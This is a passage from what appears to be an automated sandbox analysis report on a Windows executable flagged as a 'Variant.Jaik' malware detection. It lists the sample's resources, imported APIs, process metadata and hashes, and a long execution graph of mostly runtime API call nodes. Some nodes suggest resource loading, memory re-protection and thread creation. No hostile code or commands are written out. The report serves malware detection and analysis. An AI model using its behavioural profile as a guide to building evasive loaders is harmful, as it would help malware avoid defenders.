RT_ICON0x1c40d00x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
RT_ICON0x1c51780x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 12707524, next used block 13232843
RT_ICON0x1c5a200x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 2866470365, next used block 64682
RT_ICON0x1c5d080x988data
RT_ICON0x1c66900x6c8data
RT_ICON0x1c6d580x1e8data
RT_ICON0x1c6f400x468GLS_BINARY_LSB_FIRST
RT_ICON0x1c73a80x568GLS_BINARY_LSB_FIRST
RT_ICON0x1c79100x128GLS_BINARY_LSB_FIRST
RT_GROUP_ICON0x1c7a380xcadata
RT_VERSION0x1c7b080x1bcdata
DLLImport
KERNEL32.dllExitProcess, GetCommandLineW, SearchPathW, FindVolumeClose, CreateFiber, FreeResource, CreateFileTransactedW, LoadResource, InitializeSListHead, HeapFree, MoveFileWithProgressA, GetModuleHandleW, GetCommConfig, GenerateConsoleCtrlEvent, GetProcessHeap, ClearCommBreak, SetCommTimeouts, LoadLibraryW, SwitchToFiber, GetCalendarInfoW, SetConsoleCursorPosition, GetACP, SetThreadPriority, VerifyVersionInfoW, DeleteFiber, GetLastError, SetLastError, GetProcAddress, GetProcessHeaps, SetConsoleCtrlHandler, SetFileApisToANSI, FoldStringA, GetThreadPriority, DebugSetProcessKillOnExit, WaitCommEvent, EnumSystemGeoID, CloseHandle, MoveFileTransactedW, FindActCtxSectionStringW, ResetWriteWatch, CreateThread, InterlockedIncrement, InterlockedDecrement, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetFullPathNameA, GetStartupInfoW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameW, HeapValidate, IsBadReadPtr, RaiseException, RtlUnwind, TerminateProcess, GetCurrentProcess, IsDebuggerPresent, GetDriveTypeA, GetOEMCP, GetCPInfo, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, GetCurrentThreadId, TlsFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, HeapDestroy, HeapCreate, VirtualFree, GetModuleFileNameA, WriteFile, FlushFileBuffers, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, DebugBreak, OutputDebugStringA, WriteConsoleW, OutputDebugStringW, HeapAlloc, HeapSize, HeapReAlloc, VirtualAlloc, InitializeCriticalSectionAndSpinCount, GetCurrentDirectoryA, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, LoadLibraryA, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, SetFilePointer, CreateFileA
No network behavior found

Click to jump to process

Click to jump to process

Click to dive into process behavior distribution

Target ID:0
Start time:17:43:18
Start date:12/07/2022
Path:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exe"
Imagebase:0xb70000
File size:1870760 bytes
MD5 hash:74CD3C3D32DCF5029D1BC66347F44AF7
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

Reset < >

    Execution Graph

    Execution Coverage:2.7%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:7.1%
    Total number of Nodes:927
    Total number of Limit Nodes:24
    execution_graph 18566 b7cdb0 18569 b85780 18566->18569 18568 b7cdba 18570 b857c1 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 18569->18570 18571 b857a2 18569->18571 18572 b85823 18570->18572 18571->18570 18573 b857ae 18571->18573 18572->18573 18573->18568 18606 b868b4 18614 b868bb 18606->18614 18607 b868dc 18608 b86cbb SetHandleCount 18608->18607 18609 b86b73 18609->18608 18610 b86bde GetStdHandle 18609->18610 18618 b86c6c 18609->18618 18611 b86bf8 18610->18611 18610->18618 18612 b86c02 GetFileType 18611->18612 18611->18618 18613 b86c15 18612->18613 18612->18618 18616 b8e240 ___crtInitCritSecAndSpinCount InitializeCriticalSectionAndSpinCount 18613->18616 18614->18607 18614->18609 18615 b86b01 GetFileType 18614->18615 18617 b8e240 ___crtInitCritSecAndSpinCount InitializeCriticalSectionAndSpinCount 18614->18617 18615->18614 18616->18618 18617->18614 18618->18607 18618->18608 17454 b7dfe7 17455 b7dffa 17454->17455 17457 b7e00f 17454->17457 17455->17457 17474 b7f2d0 17455->17474 17459 b7e09a _memset 17457->17459 17462 b89e10 17457->17462 17481 b7e330 17459->17481 17463 b89e3a 17462->17463 17471 b89e21 17462->17471 17464 b89e72 17463->17464 17465 b89e46 RtlAllocateHeap 17463->17465 17466 b89e84 17464->17466 17487 b89ce0 17464->17487 17472 b89e90 17465->17472 17469 b89e9b 17466->17469 17470 b89ea2 HeapAlloc 17466->17470 17466->17472 17469->17470 17470->17472 17484 b85db0 17471->17484 17472->17459 17475 b7f316 17474->17475 17479 b7f30c 17474->17479 17517 b8ab10 17475->17517 17477 b7f32c 17480 b7f440 _CheckBytes 17477->17480 17524 b7f6f5 17477->17524 17479->17457 17480->17457 17532 b81290 LeaveCriticalSection 17481->17532 17483 b7e32e 17493 b85d70 GetModuleHandleW 17484->17493 17488 b89d50 17487->17488 17489 b89d24 17487->17489 17488->17466 17496 b8b2d0 17489->17496 17494 b85d8c GetProcAddress 17493->17494 17495 b85da4 ExitProcess 17493->17495 17494->17495 17499 b8b308 17496->17499 17497 b89d3e 17502 b89d52 17497->17502 17499->17497 17501 b8b414 17499->17501 17505 b8b7f0 17499->17505 17501->17497 17512 b8b900 17501->17512 17516 b81290 LeaveCriticalSection 17502->17516 17504 b89d59 17504->17488 17506 b8b84d HeapAlloc 17505->17506 17507 b8b803 HeapReAlloc 17505->17507 17508 b8b82e 17506->17508 17510 b8b885 VirtualAlloc 17506->17510 17507->17508 17509 b8b835 17507->17509 17508->17501 17509->17506 17510->17508 17511 b8b8a8 HeapFree 17510->17511 17511->17508 17514 b8b921 VirtualAlloc 17512->17514 17515 b8b9b1 17514->17515 17515->17497 17516->17504 17518 b8ab8c HeapValidate 17517->17518 17521 b8ab52 ___sbh_heap_check 17517->17521 17519 b8aba0 GetLastError 17518->17519 17520 b8abab ___doserrno 17518->17520 17519->17520 17520->17477 17527 b8ab81 17521->17527 17531 b81290 LeaveCriticalSection 17524->17531 17526 b7f6fc 17526->17479 17530 b81290 LeaveCriticalSection 17527->17530 17529 b8ab7f 17529->17518 17530->17529 17531->17526 17532->17483 19214 b839d4 19215 b839dd 19214->19215 19216 b83b27 19215->19216 19222 b839fc __setmbcp_nolock 19215->19222 19217 b83b44 IsValidCodePage 19216->19217 19221 b83b1d __setmbcp_nolock 19216->19221 19219 b83b5b GetCPInfo 19217->19219 19217->19221 19218 b805d0 setSBUpLow 5 API calls 19220 b83cd1 19218->19220 19219->19221 19224 b83b71 __setmbcp_nolock 19219->19224 19221->19218 19223 b83e40 setSBUpLow 43 API calls 19222->19223 19223->19221 19225 b83e40 setSBUpLow 43 API calls 19224->19225 19225->19221 18581 b85e10 18582 b849a0 __init_pointers 7 API calls 18581->18582 18583 b85e1b __initp_misc_winsig __init_pointers 18582->18583 18588 b8dcf0 18583->18588 18586 b848d0 __encode_pointer 7 API calls 18587 b85e88 18586->18587 18589 b848d0 __encode_pointer 7 API calls 18588->18589 18590 b85e7b 18589->18590 18590->18586 18574 b7eb70 18577 b7eb81 18574->18577 18580 b81290 LeaveCriticalSection 18577->18580 18579 b7eb7f 18580->18579 18595 b7e35e 18596 b7e375 18595->18596 18597 b809f0 __invalid_parameter 16 API calls 18596->18597 18598 b7e3c2 _memset 18596->18598 18597->18598 17533 b7ce45 17534 b7ce51 _check_managed_app 17533->17534 17559 b86d60 HeapCreate 17534->17559 17538 b7ce69 17539 b7cfb0 _fast_error_exit 3 API calls 17538->17539 17540 b7ce7c __RTC_Initialize 17538->17540 17539->17540 17570 b86840 GetStartupInfoA 17540->17570 17542 b7ce9a 17583 b86830 GetCommandLineW 17542->17583 17544 b7cead 17584 b86780 GetEnvironmentStringsW 17544->17584 17548 b7cec1 17592 b861f0 17548->17592 17551 b7ced4 17597 b858c0 17551->17597 17552 b7cee9 __wwincmdln 17605 b7a350 17552->17605 17554 b7cf35 17555 b7cf47 17554->17555 17608 b85960 17554->17608 17611 b859a0 17555->17611 17560 b7ce5b 17559->17560 17561 b86d8e __heap_init 17559->17561 17560->17538 17566 b7cfb0 17560->17566 17561->17560 17562 b86da1 17561->17562 17614 b8abe0 HeapAlloc 17562->17614 17565 b86db2 HeapDestroy 17565->17560 17567 b7cfbe 17566->17567 17568 b85db0 ___crtExitProcess 3 API calls 17567->17568 17569 b7cfd9 17568->17569 17569->17538 17578 b868bb 17570->17578 17571 b868dc 17571->17542 17572 b86cbb SetHandleCount 17572->17571 17573 b86b73 17573->17572 17574 b86bde GetStdHandle 17573->17574 17582 b86c6c 17573->17582 17575 b86bf8 17574->17575 17574->17582 17576 b86c02 GetFileType 17575->17576 17575->17582 17577 b86c15 17576->17577 17576->17582 17580 b8e240 ___crtInitCritSecAndSpinCount InitializeCriticalSectionAndSpinCount 17577->17580 17578->17571 17578->17573 17579 b86b01 GetFileType 17578->17579 17616 b8e240 InitializeCriticalSectionAndSpinCount 17578->17616 17579->17578 17580->17582 17582->17571 17582->17572 17583->17544 17585 b7ceb7 17584->17585 17586 b8679e 17584->17586 17590 b86390 GetModuleFileNameW 17585->17590 17587 b86804 __realloc_base 17586->17587 17588 b867f6 FreeEnvironmentStringsW 17586->17588 17589 b86815 FreeEnvironmentStringsW 17587->17589 17588->17585 17589->17585 17591 b863c3 _wparse_cmdline ___wsetargv 17590->17591 17591->17548 17593 b86215 _wcslen 17592->17593 17594 b8620d 17592->17594 17593->17594 17618 b899d0 17593->17618 17628 b7dbd0 17593->17628 17594->17551 17598 b858cf __IsNonwritableInCurrentImage 17597->17598 17671 b900c0 17598->17671 17604 b8590d __IsNonwritableInCurrentImage __initterm 17604->17552 18018 b78a10 17605->18018 17607 b7a358 17607->17554 18417 b85b70 17608->18417 17612 b85b70 _doexit 76 API calls 17611->17612 17613 b7cf4c 17612->17613 17615 b86dab 17614->17615 17615->17560 17615->17565 17617 b8e2d1 17616->17617 17617->17578 17619 b899de 17618->17619 17620 b89a24 17619->17620 17623 b89a54 _memset 17619->17623 17632 b809f0 17620->17632 17622 b89aed 17624 b809f0 __invalid_parameter 16 API calls 17622->17624 17623->17622 17626 b89b1d _memset 17623->17626 17625 b89a47 _memset 17624->17625 17625->17593 17626->17625 17627 b809f0 __invalid_parameter 16 API calls 17626->17627 17627->17625 17629 b7dbdd 17628->17629 17630 b7dbdb 17628->17630 17631 b80a60 __invoke_watson 10 API calls 17629->17631 17630->17593 17631->17630 17637 b849c0 TlsGetValue 17632->17637 17634 b80a07 __invalid_parameter 17636 b80a13 17634->17636 17645 b80a60 17634->17645 17636->17625 17638 b849df 17637->17638 17639 b849fe 17637->17639 17638->17639 17640 b849e8 TlsGetValue 17638->17640 17644 b84a2f 17639->17644 17652 b84970 GetModuleHandleW 17639->17652 17640->17639 17643 b84a1d GetProcAddress 17643->17644 17644->17634 17660 b81bb0 17645->17660 17647 b80a8f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17648 b80b89 GetCurrentProcess TerminateProcess 17647->17648 17651 b80b79 __invalid_parameter 17647->17651 17662 b805d0 17648->17662 17650 b80ba5 17650->17636 17651->17648 17653 b8498e 17652->17653 17655 b84989 17652->17655 17656 b85860 17653->17656 17655->17643 17655->17644 17659 b85876 17656->17659 17657 b8587c Sleep GetModuleHandleW 17658 b858a8 17657->17658 17657->17659 17658->17655 17659->17657 17659->17658 17661 b81bbc __VEC_memzero 17660->17661 17661->17647 17663 b805d8 17662->17663 17664 b805da IsDebuggerPresent 17662->17664 17663->17650 17670 b8a350 17664->17670 17667 b8df1f SetUnhandledExceptionFilter UnhandledExceptionFilter 17668 b8df48 GetCurrentProcess TerminateProcess 17667->17668 17669 b8df3e __invalid_parameter 17667->17669 17668->17650 17669->17668 17670->17667 17673 b900cf 17671->17673 17672 b858f2 17675 b85ed0 17672->17675 17673->17672 17682 b848d0 TlsGetValue 17673->17682 17677 b85edd 17675->17677 17676 b85901 17676->17604 17679 b7de20 17676->17679 17677->17676 17694 b84180 17677->17694 17843 b7dc50 17679->17843 17683 b848ef 17682->17683 17684 b84917 17682->17684 17683->17684 17685 b848f8 TlsGetValue 17683->17685 17686 b84970 __crt_wait_module_handle 3 API calls 17684->17686 17688 b8490e 17685->17688 17687 b84921 17686->17687 17689 b8492d GetProcAddress 17687->17689 17690 b8493f 17687->17690 17688->17684 17691 b84941 17688->17691 17689->17690 17690->17691 17692 b8495d 17691->17692 17693 b84953 RtlEncodePointer 17691->17693 17692->17673 17693->17692 17695 b8418e 17694->17695 17696 b84195 17694->17696 17698 b835e0 17695->17698 17696->17677 17699 b8361e 17698->17699 17715 b834d0 17699->17715 17701 b83626 17723 b83880 17701->17723 17703 b8381c 17703->17696 17704 b83638 17704->17703 17729 b83990 17704->17729 17707 b836a9 InterlockedDecrement 17708 b836d7 InterlockedIncrement 17707->17708 17709 b836ba 17707->17709 17708->17703 17710 b836fc 17708->17710 17709->17708 17710->17703 17711 b837d0 InterlockedDecrement 17710->17711 17712 b837fd InterlockedIncrement 17711->17712 17713 b837e1 17711->17713 17744 b8381e 17712->17744 17713->17712 17716 b83507 17715->17716 17717 b83593 17716->17717 17718 b83550 InterlockedDecrement 17716->17718 17719 b83575 InterlockedIncrement 17716->17719 17721 b8359f 17716->17721 17747 b835a1 17717->17747 17718->17719 17722 b8355e 17718->17722 17719->17717 17721->17701 17722->17719 17724 b838ba 17723->17724 17725 b838fa 17724->17725 17726 b838d1 GetOEMCP 17724->17726 17727 b83900 GetACP 17725->17727 17728 b838f3 __woutput_s_l _LocaleUpdate::~_LocaleUpdate 17725->17728 17726->17728 17727->17728 17728->17704 17730 b83880 getSystemCP 2 API calls 17729->17730 17731 b839ac 17730->17731 17732 b83b27 17731->17732 17738 b839b8 __setmbcp_nolock 17731->17738 17739 b839fc __setmbcp_nolock 17731->17739 17734 b83b44 IsValidCodePage 17732->17734 17732->17738 17733 b805d0 setSBUpLow 5 API calls 17735 b83699 17733->17735 17736 b83b5b GetCPInfo 17734->17736 17734->17738 17735->17703 17735->17707 17737 b83caa 17736->17737 17742 b83b71 __setmbcp_nolock 17736->17742 17737->17738 17738->17733 17740 b83b14 17739->17740 17741 b83e40 setSBUpLow 43 API calls 17740->17741 17741->17738 17751 b83e40 GetCPInfo 17742->17751 17842 b81290 LeaveCriticalSection 17744->17842 17746 b83825 17746->17703 17750 b81290 LeaveCriticalSection 17747->17750 17749 b835a8 17749->17721 17750->17749 17752 b83fbc 17751->17752 17754 b83e71 17751->17754 17753 b805d0 setSBUpLow 5 API calls 17752->17753 17755 b84178 17753->17755 17762 b8f0e0 17754->17762 17755->17738 17757 b83f4e 17766 b8ea90 17757->17766 17759 b83f85 17760 b8ea90 ___crtLCMapStringA 42 API calls 17759->17760 17760->17752 17763 b8f0f4 __woutput_s_l 17762->17763 17770 b8f140 17763->17770 17765 b8f11e _LocaleUpdate::~_LocaleUpdate 17765->17757 17767 b8eaa4 __woutput_s_l 17766->17767 17812 b8eaf0 17767->17812 17769 b8ead2 _LocaleUpdate::~_LocaleUpdate 17769->17759 17771 b8f168 17770->17771 17772 b8f151 GetStringTypeW 17770->17772 17773 b8f19f 17771->17773 17775 b8f257 17771->17775 17772->17771 17774 b8f174 GetLastError 17772->17774 17786 b94180 GetLocaleInfoA 17773->17786 17774->17771 17777 b8f27c MultiByteToWideChar 17775->17777 17780 b8f1dd __freea 17775->17780 17777->17780 17782 b8f2b3 _memset __MarkAllocaS _malloc 17777->17782 17779 b8f21e GetStringTypeA 17779->17780 17780->17765 17782->17780 17784 b8f311 MultiByteToWideChar 17782->17784 17784->17780 17785 b8f339 GetStringTypeW 17784->17785 17785->17780 17787 b941b8 17786->17787 17788 b941af 17786->17788 17809 b94140 17787->17809 17790 b805d0 setSBUpLow 5 API calls 17788->17790 17791 b8f1d1 17790->17791 17791->17779 17791->17780 17792 b941e0 17791->17792 17793 b94214 GetCPInfo 17792->17793 17808 b9429f __freea 17792->17808 17794 b9422d 17793->17794 17798 b94245 _strlen 17793->17798 17795 b94233 GetCPInfo 17794->17795 17794->17798 17795->17798 17796 b805d0 setSBUpLow 5 API calls 17797 b8f205 17796->17797 17797->17779 17797->17780 17799 b9427e MultiByteToWideChar 17798->17799 17800 b942a6 _memset __MarkAllocaS _malloc 17798->17800 17799->17800 17799->17808 17801 b94307 MultiByteToWideChar 17800->17801 17800->17808 17802 b9432e 17801->17802 17801->17808 17803 b94363 17802->17803 17804 b94334 WideCharToMultiByte 17802->17804 17805 b94369 WideCharToMultiByte 17803->17805 17806 b9438e 17803->17806 17804->17808 17805->17806 17805->17808 17807 b943b1 WideCharToMultiByte 17806->17807 17806->17808 17807->17808 17808->17796 17810 b978c0 __wcstoi64 30 API calls 17809->17810 17811 b94152 17810->17811 17811->17788 17813 b8eb01 LCMapStringW 17812->17813 17817 b8eb1d strncnt 17812->17817 17814 b8eb29 GetLastError 17813->17814 17813->17817 17814->17817 17815 b8eb86 17819 b94180 ___ansicp 30 API calls 17815->17819 17816 b8ed82 17818 b8ebd2 __freea 17816->17818 17820 b8edb5 MultiByteToWideChar 17816->17820 17817->17815 17817->17816 17818->17769 17821 b8ebc6 17819->17821 17820->17818 17826 b8edec __MarkAllocaS _malloc 17820->17826 17821->17818 17822 b8ed29 LCMapStringA 17821->17822 17823 b8ebe5 17821->17823 17822->17818 17825 b941e0 ___convertcp 12 API calls 17823->17825 17824 b8ee42 MultiByteToWideChar 17824->17818 17827 b8ee6c LCMapStringW 17824->17827 17828 b8ebfe 17825->17828 17826->17818 17826->17824 17827->17818 17829 b8ee99 17827->17829 17828->17818 17830 b8ec11 LCMapStringA 17828->17830 17831 b8eea4 17829->17831 17834 b8eeed __MarkAllocaS _malloc 17829->17834 17830->17818 17835 b8ec4b _memset __MarkAllocaS _malloc 17830->17835 17831->17818 17832 b8eebc LCMapStringW 17831->17832 17832->17818 17833 b8ef46 LCMapStringW 17833->17818 17836 b8ef6c 17833->17836 17834->17818 17834->17833 17835->17818 17839 b8ecaa LCMapStringA 17835->17839 17837 b8ef9d WideCharToMultiByte 17836->17837 17838 b8ef72 WideCharToMultiByte 17836->17838 17837->17818 17838->17818 17839->17818 17840 b8ecdd 17839->17840 17841 b941e0 ___convertcp 12 API calls 17840->17841 17841->17818 17842->17746 17844 b7dc87 _doexit 17843->17844 17849 b7dcd0 17844->17849 17850 b849c0 __encode_pointer 6 API calls 17849->17850 17851 b7dce3 17850->17851 17852 b849c0 __encode_pointer 6 API calls 17851->17852 17853 b7dcf5 17852->17853 17861 b7dc97 17853->17861 17869 b7f090 17853->17869 17855 b848d0 __encode_pointer 7 API calls 17856 b7ddf5 17855->17856 17858 b848d0 __encode_pointer 7 API calls 17856->17858 17858->17861 17860 b7dd7d 17860->17861 17862 b7e480 __realloc_dbg 57 API calls 17860->17862 17863 b7ddb3 17860->17863 17866 b7dcab 17861->17866 17862->17863 17863->17861 17864 b848d0 __encode_pointer 7 API calls 17863->17864 17865 b7dde4 17864->17865 17865->17855 18014 b85df0 17866->18014 17870 b7f0d4 17869->17870 17871 b7f12c 17870->17871 17872 b7f0fb 17870->17872 17873 b7f14b 17871->17873 17875 b7f2d0 __CrtCheckMemory 3 API calls 17871->17875 17874 b809f0 __invalid_parameter 16 API calls 17872->17874 17886 b7f890 17873->17886 17877 b7dd23 17874->17877 17875->17873 17877->17860 17877->17865 17880 b7e480 17877->17880 17878 b7f1a5 17892 b7f256 17878->17892 17881 b7e4b9 17880->17881 17896 b7e520 17881->17896 17883 b7e4de 17907 b7e4f2 17883->17907 17887 b7f8a3 _CrtMemDumpAllObjectsSince_stat 17886->17887 17891 b7f89c ___sbh_verify_block 17886->17891 17888 b7f8c7 ___sbh_find_block 17887->17888 17889 b7f910 HeapValidate 17887->17889 17887->17891 17890 b7f8f6 HeapValidate 17888->17890 17888->17891 17889->17891 17890->17891 17891->17878 17895 b81290 LeaveCriticalSection 17892->17895 17894 b7f25d 17894->17877 17895->17894 17897 b7e55a 17896->17897 17899 b7e53d _memset 17896->17899 17898 b7f2d0 __CrtCheckMemory 3 API calls 17897->17898 17897->17899 17900 b7e59c _CheckBytes 17897->17900 17898->17900 17899->17883 17900->17899 17901 b7f890 __CrtIsValidHeapPointer 2 API calls 17900->17901 17902 b7e7aa 17901->17902 17902->17899 17903 b7e893 17902->17903 17904 b7e8b8 17902->17904 17910 b8a640 17903->17910 17939 b8a370 17904->17939 18013 b81290 LeaveCriticalSection 17907->18013 17909 b7e4f0 17909->17860 17911 b8a67e 17910->17911 17912 b8a68f 17910->17912 17956 b89d80 17911->17956 17913 b8a6a8 17912->17913 17914 b8a695 17912->17914 17922 b8a912 17913->17922 17932 b8a6b5 __realloc_base ___sbh_resize_block ___sbh_find_block 17913->17932 17963 b8a9e0 17914->17963 17917 b8a947 17921 b856b0 __callnewh 6 API calls 17917->17921 17918 b8a85e 17978 b856b0 17918->17978 17920 b8a92c HeapReAlloc 17920->17922 17935 b8a687 __get_errno_from_oserr 17921->17935 17922->17917 17922->17920 17923 b8a971 17922->17923 17925 b856b0 __callnewh 6 API calls 17922->17925 17927 b8a9a6 GetLastError 17922->17927 17922->17935 17924 b8a979 GetLastError 17923->17924 17923->17935 17924->17935 17925->17922 17927->17935 17928 b8a79c HeapAlloc 17928->17932 17929 b8b2d0 ___sbh_alloc_block 5 API calls 17929->17932 17930 b8a836 HeapReAlloc 17930->17932 17931 b8a88b 17934 b8a899 GetLastError 17931->17934 17931->17935 17932->17918 17932->17928 17932->17929 17932->17930 17932->17931 17933 b856b0 __callnewh 6 API calls 17932->17933 17936 b8a8d6 17932->17936 17938 b8ad10 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 17932->17938 17975 b8a818 17932->17975 17933->17932 17934->17935 17935->17899 17936->17935 17937 b8a8dc GetLastError 17936->17937 17937->17935 17938->17932 17940 b8a3b4 17939->17940 17941 b8a3d8 17940->17941 17942 b8a405 17940->17942 17946 b809f0 __invalid_parameter 16 API calls 17941->17946 17943 b8a3fb __get_errno_from_oserr 17942->17943 17944 b8a4f5 HeapSize HeapReAlloc 17942->17944 17949 b8a42a ___sbh_resize_block ___sbh_find_block 17942->17949 17943->17899 17944->17943 17947 b8a53f 17944->17947 17946->17943 17948 b8a561 GetLastError 17947->17948 18000 b8a590 17947->18000 17948->17943 17997 b8a48e 17949->17997 17953 b8a4ac HeapReAlloc 17953->17943 17955 b8a4d8 GetLastError 17953->17955 17955->17943 17957 b89dd6 17956->17957 17962 b89d93 17956->17962 17959 b856b0 __callnewh 6 API calls 17957->17959 17958 b89e10 __heap_alloc_base 11 API calls 17958->17962 17961 b89da8 17959->17961 17960 b856b0 __callnewh 6 API calls 17960->17962 17961->17935 17962->17958 17962->17960 17962->17961 17964 b8aa24 17963->17964 17974 b8aa1f __get_errno_from_oserr 17963->17974 17965 b8aabc RtlFreeHeap 17964->17965 17967 b8aa31 ___sbh_find_block 17964->17967 17966 b8aad7 GetLastError 17965->17966 17965->17974 17966->17974 17970 b8aa64 17967->17970 17981 b8ad10 17967->17981 17988 b8aa75 17970->17988 17972 b8aa86 HeapFree 17973 b8aaa2 GetLastError 17972->17973 17972->17974 17973->17974 17974->17935 17996 b81290 LeaveCriticalSection 17975->17996 17977 b8a81f 17977->17932 17979 b849c0 __encode_pointer 6 API calls 17978->17979 17980 b856c1 17979->17980 17980->17935 17982 b8ad6d 17981->17982 17984 b8ad68 17981->17984 17983 b8b173 VirtualFree 17982->17983 17982->17984 17985 b8b200 17983->17985 17984->17970 17985->17984 17986 b8b224 VirtualFree HeapFree 17985->17986 17991 b80670 17986->17991 17995 b81290 LeaveCriticalSection 17988->17995 17990 b8aa73 17990->17972 17990->17974 17992 b80688 17991->17992 17993 b806b7 17992->17993 17994 b806af __VEC_memcpy 17992->17994 17993->17984 17994->17993 17995->17990 17996->17977 18009 b81290 LeaveCriticalSection 17997->18009 17999 b8a48c 17999->17943 17999->17953 18001 b8a5a8 GetModuleHandleW 18000->18001 18006 b8a5d1 18000->18006 18002 b8a5bc GetProcAddress 18001->18002 18001->18006 18004 b848d0 __encode_pointer 7 API calls 18002->18004 18004->18006 18010 b849a0 18006->18010 18007 b8a555 18007->17943 18007->17948 18008 b849c0 __encode_pointer 6 API calls 18008->18007 18009->17999 18011 b848d0 __encode_pointer 7 API calls 18010->18011 18012 b849ac 18011->18012 18012->18007 18012->18008 18013->17909 18017 b81290 LeaveCriticalSection 18014->18017 18016 b7dca9 18016->17604 18017->18016 18019 b78a25 18018->18019 18020 b78a64 LoadLibraryW 18018->18020 18069 b7cce0 18019->18069 18022 b78a8a 18020->18022 18024 b78cd2 GetLastError 18022->18024 18028 b78caf 18022->18028 18032 b78ab6 GetThreadPriority GetCommandLineW SetLastError GenerateConsoleCtrlEvent MoveFileWithProgressA 18022->18032 18033 b78af1 GetProcessHeaps GetLastError 18022->18033 18025 b78d1e 18024->18025 18026 b78ceb InitializeSListHead DebugSetProcessKillOnExit 18024->18026 18056 b788f0 18025->18056 18029 b78cfb EnumSystemGeoID 18026->18029 18034 b78ccd 18028->18034 18035 b78cbb GetModuleHandleW 18028->18035 18029->18025 18036 b78d0b GetProcessHeap HeapFree 18029->18036 18032->18033 18033->18028 18034->18024 18035->18024 18036->18029 18040 b78d8f LoadResource 18041 b78da8 GetACP FreeResource 18040->18041 18045 b78dcd 18040->18045 18041->18045 18042 b78e21 18046 b78e64 type_info::_Type_info_dtor 18042->18046 18078 b7c690 18042->18078 18043 b788f0 12 API calls 18043->18045 18045->18042 18045->18043 18047 b7a2f2 18046->18047 18048 b7a29d SetConsoleCtrlHandler SetConsoleCursorPosition 18046->18048 18051 b7a32c VirtualProtect 18047->18051 18052 b7a2fe 18047->18052 18084 b7a370 18048->18084 18050 b7a2c3 18054 b7a2da GetCalendarInfoW 18050->18054 18051->17607 18052->18047 18095 b78800 18052->18095 18090 b7a3e0 18054->18090 18057 b78915 SearchPathW FindActCtxSectionStringW ResetWriteWatch FoldStringA SetCommTimeouts 18056->18057 18058 b78909 18056->18058 18059 b7897a GetLastError 18057->18059 18058->18057 18058->18059 18060 b78989 _malloc 18059->18060 18061 b78995 18060->18061 18062 b789fc ExitProcess 18060->18062 18063 b789f7 GetProcAddress 18061->18063 18064 b789a1 MoveFileTransactedW CreateThread 18061->18064 18067 b787b0 18063->18067 18065 b789f1 SetFileApisToANSI 18064->18065 18066 b789dd SwitchToFiber DeleteFiber 18064->18066 18065->18063 18066->18065 18068 b787cb VirtualProtect 18067->18068 18068->18040 18068->18045 18070 b7ccee 18069->18070 18071 b7cd0d 18069->18071 18100 b7c7a0 18070->18100 18072 b7c7a0 wcstoxq 17 API calls 18071->18072 18074 b78a30 18072->18074 18075 b7c170 18074->18075 18121 b7c1a0 18075->18121 18077 b78a3e SetThreadPriority FindVolumeClose GetCommConfig 18077->18020 18079 b7c6bc __woutput_s_l 18078->18079 18189 b82460 18079->18189 18081 b7c6de __ld12tod _LocaleUpdate::~_LocaleUpdate 18082 b805d0 setSBUpLow 5 API calls 18081->18082 18083 b7c78d 18082->18083 18083->18046 18085 b7a399 std::_String_base::_Xlen 18084->18085 18214 b7a4e0 18085->18214 18087 b7a3b4 18220 b7a4a0 18087->18220 18091 b7a4e0 17 API calls 18090->18091 18092 b7a3f3 18091->18092 18414 b7a450 18092->18414 18099 b78817 18095->18099 18096 b788cc 18096->18052 18097 b78839 CreateFileTransactedW CreateFiber WaitCommEvent 18098 b78887 ClearCommBreak CloseHandle VerifyVersionInfoW 18097->18098 18097->18099 18098->18099 18099->18096 18099->18097 18102 b7c7d5 18100->18102 18101 b7c820 18103 b809f0 __invalid_parameter 16 API calls 18101->18103 18102->18101 18105 b7c86e 18102->18105 18109 b7c843 wcstoxq __aulldiv __aullrem __wchartodigit _LocaleUpdate::~_LocaleUpdate 18103->18109 18104 b7c8c0 18106 b809f0 __invalid_parameter 16 API calls 18104->18106 18105->18104 18107 b7c90e __woutput_s_l 18105->18107 18106->18109 18107->18109 18110 b854c0 18107->18110 18109->18074 18111 b854db __woutput_s_l 18110->18111 18113 b854d3 _LocaleUpdate::~_LocaleUpdate 18110->18113 18111->18113 18114 b90040 18111->18114 18113->18107 18115 b90054 __woutput_s_l 18114->18115 18118 b90090 18115->18118 18117 b9007a _LocaleUpdate::~_LocaleUpdate 18117->18113 18119 b9009b 18118->18119 18120 b9009f GetStringTypeW 18118->18120 18119->18117 18120->18119 18122 b7c1ae 18121->18122 18123 b7c1b8 18121->18123 18122->18123 18124 b7c1cd 18122->18124 18136 b814d0 18123->18136 18126 b7c1d7 GetFullPathNameA 18124->18126 18127 b7c271 18124->18127 18128 b7c1f0 GetLastError 18126->18128 18130 b7c206 18126->18130 18129 b7c2a6 18127->18129 18127->18130 18135 b7c1c5 __dosmaperr type_info::_Type_info_dtor 18128->18135 18132 b809f0 __invalid_parameter 16 API calls 18129->18132 18131 b7c2d9 GetFullPathNameA 18130->18131 18130->18135 18134 b7c31d type_info::_Type_info_dtor 18131->18134 18131->18135 18132->18135 18133 b7c335 GetLastError 18133->18135 18134->18133 18134->18135 18135->18077 18137 b81509 18136->18137 18142 b81560 18137->18142 18148 b81590 18142->18148 18144 b81522 18145 b81536 18144->18145 18188 b81290 